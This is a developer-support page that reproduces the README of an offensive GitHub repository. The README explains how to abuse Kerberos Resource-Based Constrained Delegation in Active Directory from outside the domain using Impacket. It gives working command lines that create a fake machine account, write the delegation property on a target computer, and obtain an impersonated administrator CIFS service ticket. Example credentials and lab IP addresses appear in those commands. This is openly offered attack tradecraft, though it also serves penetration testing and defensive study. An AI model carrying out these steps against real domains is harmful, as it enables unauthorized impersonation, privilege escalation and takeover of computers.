Need help with rbcd-attack?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

tothi
230 Stars 28 Forks 8 Commits 0 Opened issues

Description

Kerberos Resource-Based Constrained Delegation Attack from Outside using Impacket

Services available

!
?

Need anything else?

Contributors list

# 144,351
D
Shell
Visual ...
Django
6 commits

Abusing Kerberos Resource-Based Constrained Delegation

TL;DR

This repo is about a practical attack against Kerberos Resource-Based Constrained Delegation in a Windows Active Directory Domain.

The difference from other common implementations is that we are launching the attack from outside of the Windows Domain, not from a domain joined (usually Windows) computer.

The attack is implemented using only Python3 Impacket (and its dependencies). Tested on Arch with up-to-date Impacket (0.9.21 as of writing).

Attack Log

The Attack

In summary, without any deep details, the attack targets a domain computer, exactly service principals related to the target domain computer.

What we need here as prerequisites:

  • a domain account with write access to the target computer (exactly write access to the
    msDS-AllowedToActOnBehalfOfOtherIdentity
    property of the target computer domain object)
  • permission to create new computer accounts (this is usually default, see
    MachineAccountQuota
    )
  • LDAP (389/tcp) and SAMR (445/tcp) (or LDAPS (636/tcp)) access to the DC.
  • Kerberos (88/tcp) access to the DC

The attack path in very high level:

  1. Create a fake computer
  2. Abuse
    msDS-AllowedToActOnBehalfOfOtherIdentity
    property of the target
  3. Request impersonated Service Tickets (S4U) for the target computer

Benefit:

  • Impersonated Service Tickets may allow high-level access to services on the target like CIFS, HTTP, etc, if the impersonated account has privileges. Sometimes takeover of the computer.

Common toolsets

The common toolsets for this attack operate on a domain-joined Windows Computer using:

Impacket implementation

This implementation uses pure Impacket from outside the Domain.

Creating the fake computer

Using addcomputer.py example from Impacket let's create a fake computer (called

evilcomputer
):
addcomputer.py -computer-name 'evilcomputer$' -computer-pass [email protected] -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0

Modifying delegation rights

Implemented the script rbcd.py found here in the repo which adds the related security descriptor of the newly created EVILCOMPUTER to the

msDS-AllowedToActOnBehalfOfOtherIdentity
property of the target computer.
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0

The script uses heavily the Python classes in the

ntlmrelayx.py
Impacket example. For help and an example call the script without options.

Getting the impersonated service ticket

Now everything is ready for abusing the Constrained Delegation by an S4U2Self query and get an impersonated Service Ticket for the target computer. With

getST.py
Impacket example script:
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:[email protected]

The above command fetches a CIFS Service Ticket on behalf of the targetted domain user

admin
and stores it in the file
admin.ccache
.

After adding the file path to the KRB5CCNAME variable the ticket is usable for Kerberos clients.

export KRB5CCNAME=`pwd`/admin.ccache
klist

References

For details about abusing Resource-Based Constrained Delegation:

  • https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
  • https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/
  • http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/

And one of the most comprehensive presentations about Kerberos Attacks:

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.